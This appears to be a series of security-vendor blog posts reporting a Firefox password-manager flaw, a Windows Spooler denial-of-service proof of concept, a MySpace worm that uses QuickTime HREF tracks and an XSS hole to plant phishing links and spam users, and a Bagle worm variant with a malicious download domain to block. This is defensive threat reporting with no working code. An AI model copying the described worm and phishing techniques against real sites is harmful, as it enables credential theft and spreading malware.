A flaw in Mozilla Firefox’s Password Manager allows the sending of password information to a remote user’s Web site. This attack scenario can only work on Web sites that allows the creation of HTML forms, such as blogs and social networking sites like MySpace.com.

Firefox’s developers rate this flaw as Critical and have observed that it results from Password Manager’s lack of steps in checking if it is sending password information to the correct server. More information about this vulnerability is detailed in Mozilla project’s Bugzilla database.

We received reports of an early Christmas DoS 0-day exploit earlier today and found a PoC from Milw0rm. The problem lies with the GetPrinterData function in the Windows Spooler service. A denial of service attack will happen upon successful exploitation. We have submitted it already for processing of appropriate Trend solution for this. We will update you on this as soon as there are anything to report.

A new worm has been found on MySpace (a social networking website) that takes advantage of Apple QuickTime movie’s HREF Track feature and MySpace’s XSS vulnerability to successfully propagate and execute its malicious actions. The malware author also intends to steal other MySpace user logins by setting up a phishing site where its url was being advertised by the worm accomplice.

The menace starts when a MySpace user views a malicious embedded QuickTime movie file (.mov). Yes, a movie file… but we are not talking of a vulnerability in QuickTime but rather a special feature built into QT movie file called HREF Track.

An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that loads QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.

…

The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.

This movie file loads a malicious javascript file which actually does the necessary modification to the user’s profile page by replacing the navigational links on the page with the fake ones (points to the MySpace phish on the same domain) through some CSS and HTML codes. This approach is possible due to MySpace’s XSS vulnerability. After that, here comes the ‘wormy’ part of the malicious javascript, it adds the malicious QuickTime movie file to the user’s “Interests” sections to further propagate the copy of the worm and the phishing attack. Any MySpace user who visits an infected user’s profile will also have his navigational menus trojanized.

What is also noticing about this worm is its capability to send a random message to users with id’s from 80000000 to 105000000. The worm selects one of the six subjects below to send to random user every 6 seconds.

• what else is there to do on a Sunday.?…….
  
• You better not forget about this..
  
• Hehe that was so funny..
  
• better see this one last time lol..
  
• omg did you see this last nite..
  
• whos coming to the party tonight.?..

The body of the message is supposed to be a file named ‘youtubedt7rf2.jpg’ but I unfortunately wasn’t able to get a copy because the source url is no longer available.

Trend Micro has given the detection name JS_QSPACE.A for the malicious javascript.

Just a heads up…last Dec 1, we saw a lot of the bagle worm being spammed through e-mails. Trend Micro saw to this and has created detection as WORM_BAGLE.GS.

This new bagle has all the techniques that a WORM_BAGLE should have, from the password protected file to a decoy text file to rootkits, to see a more technical analysis please check the malware report that was created here.

I checked the download site again today, and what do you know, it’s still there! It has very minor tweaks in its body just to change the md5 sum in its effort to avoid detection.

Trend Micro customers need not to worry though as we have already created solutions for this particular sample.

Admins might also want to block www.bronko-m.ru, this is the domain of the download URL of WORM_BALGE.GS.